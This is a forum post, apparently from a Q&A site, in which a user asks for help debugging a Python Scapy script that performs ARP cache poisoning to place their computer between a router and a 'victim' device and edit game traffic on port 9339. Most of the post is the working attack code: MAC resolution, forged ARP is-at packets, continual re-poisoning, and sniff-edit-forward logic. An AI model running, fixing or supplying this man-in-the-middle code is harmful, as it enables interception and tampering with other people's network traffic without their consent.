Firstly, I would like to clarifiy 2 points:
- I have hesitated between posting here or on stackoverflow. I don't really understand if it is my code or some kind of security on my router. So, if you think this question should not be posted there, feel free to flag it in
- If you think I'm trying to violate, hack, or whatever, I beg you to not report my question. If I wanted so, I would rather use one of those numerous souftware -clickbait-.
To achieve this, I'm using the well-known packet crafting library Scapy.
Firstly, I'm retrieving mac address of router and victim. Then, I craft 2 ARP is-at packet, one for the router, and one for the victim, to set my computer in the middle of them.
def main():
print("\nIP address of your router/box :")
ipserveur = raw_input()
print("\nIP address of your device playing CC :")
ipvictime = raw_input()
print("\nResolving mac address of your router/box...")
arp = Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ipserveur)
rep, nonrep = srp(arp, timeout=3, verbose=0)
if(rep):
macserveur = rep[0][1].hwsrc
print("Router mac address is "+macserveur)
else: print("Unable to resolve mac address of your router")
arp.pdst = ipvictime
print("Resolving mac address of your device...")
arp = Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ipvictime)
rep, nonrep = srp(arp, timeout=3, verbose=0)
if(rep):
macvictime = rep[0][1].hwsrc
print("Device mac address is "+macvictime)
else: print("Unable to resolve mac address of your device")
if('macserveur' in locals() and 'macvictime' in locals()):
print("\nCompromising serveur arp cache")
arpserveur = Ether(dst=macserveur)/ARP(op="is-at",psrc=ipvictime,hwdst=macserveur,pdst=ipserveur)
arpvictime = Ether(dst=macvictime)/ARP(op="is-at",psrc=ipserveur,hwdst=macvictime,pdst=ipvictime)
arpserveur.show()
arpvictime.show()
sendp(arpserveur, verbose=0)
sendp(arpvictime, verbose=0)
print("Serveur cache compromised")
while True:
pkt = sniff(count=1)
pkt.show()
filtrer(pkt, arpserveur, arpvictime)
else:
print("Fatal error, stopping...")
Once I achieve this, I'm sniffing packet. If I sniff an ARP packet, I'm recompromising ARP cache of both server and victim. If I sniff a packet which match my filter, I edit it and send it back to the recipient. In other case, I just send it back to the recipient.
This should immitate ip_forwarding tool which is unactivated on my Debian computer appart that I can edit packet between server and victim.
def filtrer(pkt, arpserveur, arpvictime):
if(ARP in pkt[0]):
#if arp packet on the network, then compromise arp cache again
print("Recomprimising arp cache again")
sendp(arpserveur, verbose=0)
sendp(arpvictime, verbose=0)
elif(TCP in pkt[0] and (pkt[0].dport==9339 or pkt[0].sport==9339)):
#if port = 9339, detected connection to the game
editCC(pkt)
#forward the edited packet
sendp(pkt, verbose=0)
else:
#forward the packet
print("Forwarding packet ")
sendp(pkt, verbose=0)
So yeah, basically, what are the problem ? I have many strange bugs.
- When I launch the attack, it sometimes works during a few seconds but packet do not seems to be correctly forwarded because the victim doesn't have internet anymore. It means etheir the request never reach the router or the reply never reach back the victim.
- Sometimes, the attacker ARP cache seems to be compromised also. Or at least bugged. I have to do
sudo arpto reuptade the arp cache because I can't send request to any device/router on my network. Like if I was banned.
I have a totally normal router as I'm experiencing this at home. It isn't a secure network so basically, it should not be secure in any way. Feel free to ask for any precision you would need to clarify the situation !
